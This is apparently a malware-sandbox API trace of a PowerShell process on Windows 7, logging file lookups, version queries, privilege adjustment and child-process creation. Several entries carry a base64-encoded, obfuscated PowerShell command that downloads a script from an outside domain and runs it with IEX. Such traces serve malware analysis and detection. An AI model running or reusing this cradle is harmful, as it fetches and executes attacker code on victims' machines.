	[0341.799] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.799] SetErrorMode (uMode=0x1) returned 0x1
	[0341.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0341.800] SetErrorMode (uMode=0x1) returned 0x1
	[0341.800] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0341.800] SetErrorMode (uMode=0x1) returned 0x1
	[0341.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0341.800] SetErrorMode (uMode=0x1) returned 0x1
	[0341.800] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c73db80 | out: lpFindFileData=0x1c73db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3dbf80
	[0341.801] FindNextFileW (in: hFindFile=0x3dbf80, lpFindFileData=0x1c73db90 | out: lpFindFileData=0x1c73db90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0341.802] FindClose (in: hFindFile=0x3dbf80 | out: hFindFile=0x3dbf80) returned 1
	[0341.802] SetErrorMode (uMode=0x1) returned 0x1
	[0342.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c73dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0342.245] SetErrorMode (uMode=0x1) returned 0x1
	[0342.245] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c73deb0 | out: lpFileInformation=0x1c73deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0342.245] SetErrorMode (uMode=0x1) returned 0x1
	[0342.246] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.246] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.247] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.247] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.250] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.250] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.258] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.258] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.269] CoTaskMemAlloc (cb=0x3b) returned 0x1b42d130
	[0342.270] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c73e098, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c73e098) returned 0x4550
	[0342.272] CoTaskMemFree (pv=0x1b42d130) 
	[0342.275] GetConsoleWindow () returned 0x20206
	[0342.281] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.281] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.281] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.282] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0342.282] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.623] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0342.623] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0342.623] CoTaskMemFree (pv=0x3d2bc0) 
	[0342.626] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c73e0e0 | out: pNumArgs=0x1c73e0e0) returned 0x351750*=""
	[0342.627] lstrlenW (lpString="-EncodedCommand") returned 15
	[0342.628] CoTaskMemAlloc (cb=0x22) returned 0x1b418a90
	[0342.628] RtlMoveMemory (in: Destination=0x1b418a90, Source=0x351772, Length=0x20 | out: Destination=0x1b418a90) 
	[0342.628] CoTaskMemFree (pv=0x1b418a90) 
	[0342.628] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0342.628] CoTaskMemAlloc (cb=0x2f4) returned 0x1b43e3d0
	[0342.628] RtlMoveMemory (in: Destination=0x1b43e3d0, Source=0x351792, Length=0x2f2 | out: Destination=0x1b43e3d0) 
	[0342.628] CoTaskMemFree (pv=0x1b43e3d0) 
	[0342.629] LocalFree (hMem=0x351750) returned 0x0
	[0342.630] CoTaskMemAlloc (cb=0x804) returned 0x1b43e3d0
	[0342.630] GetConsoleTitleW (in: lpConsoleTitle=0x1b43e3d0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0342.630] CoTaskMemFree (pv=0x1b43e3d0) 
	[0342.638] CoTaskMemAlloc (cb=0x38e) returned 0x351750
	[0342.638] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c73e040*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f01d8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30f01d8*(hProcess=0x364, hThread=0x360, dwProcessId=0xd88, dwThreadId=0xdb8)) returned 1
	[0342.775] CoTaskMemFree (pv=0x351750) 
	[0342.777] CloseHandle (hObject=0x360) returned 1
	[0342.777] CoTaskMemAlloc (cb=0x3b) returned 0x1b42d130
	[0342.777] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c73e0e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c73e0e8) returned 0x4550
	[0342.777] CoTaskMemFree (pv=0x1b42d130) 
	[0342.780] GetCurrentProcess () returned 0xffffffffffffffff
	[0342.781] GetCurrentProcess () returned 0xffffffffffffffff
	[0342.781] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73e1c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73e1c8*=0x360) returned 1

Process:
	id = "15"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2f088000"
	os_pid = "0xa3c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 89
	os_tid = 0xa68

	[0268.446] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0270.892] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0270.892] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0270.893] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0270.893] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0275.858] GetVersionExW (in: lpVersionInformation=0x28da40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28da40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0275.860] GetVersionExW (in: lpVersionInformation=0x28da40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28da40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0275.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0275.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0275.872] GetVersionExW (in: lpVersionInformation=0x28d7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28d7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0275.872] SetErrorMode (uMode=0x1) returned 0x1
	[0275.873] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28d910 | out: lpFileInformation=0x28d910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0275.874] SetErrorMode (uMode=0x1) returned 0x1
	[0275.877] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28db80 | out: lpdwHandle=0x28db80) returned 0x94c
	[0275.879] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2af72d8 | out: lpData=0x2af72d8) returned 1
	[0276.236] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28daf8, puLen=0x28daf0 | out: lplpBuffer=0x28daf8*=0x2af7374, puLen=0x28daf0) returned 1
	[0276.238] lstrlenW (lpString="䅁") returned 1
	[0276.246] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af7450, puLen=0x28da60) returned 1
	[0276.246] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0276.248] CoTaskMemAlloc (cb=0x2e) returned 0x14bfc0
	[0276.248] lstrcpyW (in: lpString1=0x14bfc0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0276.249] CoTaskMemFree (pv=0x14bfc0) 
	[0276.249] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af74a4, puLen=0x28da60) returned 1
	[0276.249] lstrlenW (lpString="System.Management.Automation") returned 28
	[0276.249] CoTaskMemAlloc (cb=0x3c) returned 0xc9070
	[0276.249] lstrcpyW (in: lpString1=0xc9070, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0276.249] CoTaskMemFree (pv=0xc9070) 
	[0276.249] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af7500, puLen=0x28da60) returned 1
	[0276.249] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0276.249] CoTaskMemAlloc (cb=0x20) returned 0x14a320
	[0276.249] lstrcpyW (in: lpString1=0x14a320, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0276.249] CoTaskMemFree (pv=0x14a320) 
	[0276.249] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af7540, puLen=0x28da60) returned 1
	[0276.249] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0276.249] CoTaskMemAlloc (cb=0x44) returned 0xc9070
	[0276.249] lstrcpyW (in: lpString1=0xc9070, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0276.249] CoTaskMemFree (pv=0xc9070) 
	[0276.249] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af75a8, puLen=0x28da60) returned 1
	[0276.249] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0276.249] CoTaskMemAlloc (cb=0x76) returned 0xf4390
	[0276.249] lstrcpyW (in: lpString1=0xf4390, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0276.249] CoTaskMemFree (pv=0xf4390) 
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af7644, puLen=0x28da60) returned 1
	[0276.250] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0276.250] CoTaskMemAlloc (cb=0x44) returned 0xc9070
	[0276.250] lstrcpyW (in: lpString1=0xc9070, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0276.250] CoTaskMemFree (pv=0xc9070) 
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af76a8, puLen=0x28da60) returned 1
	[0276.250] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0276.250] CoTaskMemAlloc (cb=0x58) returned 0x116dd0
	[0276.250] lstrcpyW (in: lpString1=0x116dd0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0276.250] CoTaskMemFree (pv=0x116dd0) 
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af7724, puLen=0x28da60) returned 1
	[0276.250] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0276.250] CoTaskMemAlloc (cb=0x20) returned 0x14a320
	[0276.250] lstrcpyW (in: lpString1=0x14a320, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0276.250] CoTaskMemFree (pv=0x14a320) 
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x2af73cc, puLen=0x28da60) returned 1
	[0276.250] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0276.250] CoTaskMemAlloc (cb=0x66) returned 0x1497e0
	[0276.250] lstrcpyW (in: lpString1=0x1497e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0276.250] CoTaskMemFree (pv=0x1497e0) 
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x0, puLen=0x28da60) returned 0
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x0, puLen=0x28da60) returned 0
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28da68, puLen=0x28da60 | out: lplpBuffer=0x28da68*=0x0, puLen=0x28da60) returned 0
	[0276.250] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28da38, puLen=0x28da30 | out: lplpBuffer=0x28da38*=0x2af7374, puLen=0x28da30) returned 1
	[0276.251] CoTaskMemAlloc (cb=0x204) returned 0xf9630
	[0276.251] VerLanguageNameW (in: wLang=0x0, szLang=0xf9630, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0276.252] CoTaskMemFree (pv=0xf9630) 
	[0276.252] VerQueryValueW (in: pBlock=0x2af72d8, lpSubBlock="\\", lplpBuffer=0x28da88, puLen=0x28da80 | out: lplpBuffer=0x28da88*=0x2af7300, puLen=0x28da80) returned 1
	[0276.256] GetCurrentProcessId () returned 0xa3c
	[0276.317] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28c9b0 | out: lpLuid=0x28c9b0*(LowPart=0x14, HighPart=0)) returned 1
	[0276.820] GetCurrentProcess () returned 0xffffffffffffffff
	[0276.821] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x28c9d0 | out: TokenHandle=0x28c9d0*=0x2ec) returned 1
	[0276.822] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2afab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0276.823] CloseHandle (hObject=0x2ec) returned 1
	[0276.836] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa3c) returned 0x2ec
	[0276.846] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2afabb8, cb=0x200, lpcbNeeded=0x28d9e8 | out: lphModule=0x2afabb8, lpcbNeeded=0x28d9e8) returned 1
	[0276.848] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2afae28, cb=0x18 | out: lpmodinfo=0x2afae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0276.849] CoTaskMemAlloc (cb=0x804) returned 0x153c50
	[0276.850] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x153c50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0276.850] CoTaskMemFree (pv=0x153c50) 
	[0276.851] CoTaskMemAlloc (cb=0x804) returned 0x153c50
	[0276.851] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x153c50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0276.851] CoTaskMemFree (pv=0x153c50) 
	[0276.852] CloseHandle (hObject=0x2ec) returned 1
	[0276.860] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa3c) returned 0x2ec
